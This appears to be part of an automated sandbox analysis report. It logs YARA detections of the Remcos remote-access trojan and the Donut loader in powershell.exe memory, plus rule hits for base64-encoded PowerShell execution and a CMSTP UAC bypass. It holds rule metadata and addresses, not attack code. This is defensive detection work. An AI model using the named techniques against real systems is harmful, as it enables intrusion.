              Source: 00000014.00000002.1784027157.0000000008C9C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000002A.00000002.2515947583.000000000942C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000002A.00000002.2517437767.000000000BB95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000020.00000002.2116165246.0000000008B7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.1754524729.0000000005D0E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000002A.00000002.2381301082.0000000006468000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000003F.00000002.3285696458.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000014.00000002.1753263642.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000004B.00000002.3916357239.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000035.00000002.3010363046.0000000008EBC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000050.00000002.4155888640.0000000005A5D000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000F.00000002.1616821481.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000003A.00000002.3015761795.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000019.00000002.1954330388.0000000008DBC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.1787537306.000000000A471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000044.00000002.3628599649.00000000057AA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000019.00000002.1909103811.0000000005F3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000050.00000002.4122586457.0000000005A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000025.00000002.2296515608.0000000008C7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.1630733109.000000000B581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000035.00000002.2781991173.00000000060E9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000004B.00000002.3953316191.0000000005F3C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000019.00000002.1906868273.0000000005ED6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000003A.00000002.3037691114.0000000005CF9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000003F.00000002.3306381438.0000000005DE9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00401806 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_004016FD NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0044B040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0043610D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00447310
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0044A490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0040755A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0043C560
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0044B610
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0044D6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_004476F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0044B870
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0044081D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00414957
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_004079EE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00407AEB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0044AA80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00412AA9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00404B74
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00404B03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_0044BBD8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00404BE5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00404C76
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00415CFE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00416D72
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00446D30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00446D8B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 7_2_00406E8F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_00405038
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0041208C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_004050A9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0040511A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0043C13A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_004051AB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_00449300
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0040D322
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0044A4F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0043A5AB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_00413631
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_00446690
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0044A730
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_004398D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_004498E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0044A886
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0043DA09
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_00438D5E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_00449ED0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_0041FE83
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_00430F54
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_004050C2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_004014AB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_00405133
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_004051A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_00401246
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_0040CA46
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_00405235
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_004032C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_00401689
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_00402F60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: String function: 00416760 appears 69 times
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 3663
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000003A.00000002.3443687584.0000000008D0C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000002F.00000002.2572521172.0000000005EE8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000002A.00000002.2399349513.00000000066F4000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000035.00000002.3013528096.000000000A691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000F.00000002.1617304143.0000000005E3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000020.00000002.2049158626.0000000005AC9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000025.00000002.2204277686.0000000005B98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000002F.00000002.2705660969.0000000008D1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000025.00000002.2207744918.0000000005C38000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000044.00000002.3579093433.000000000570A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000002F.00000002.2567062053.0000000005E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000035.00000002.2768925808.0000000006049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000019.00000002.1954879195.000000000B599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000020.00000002.2046612983.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.1784027157.0000000008C9C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000002A.00000002.2515947583.000000000942C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000002A.00000002.2517437767.000000000BB95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
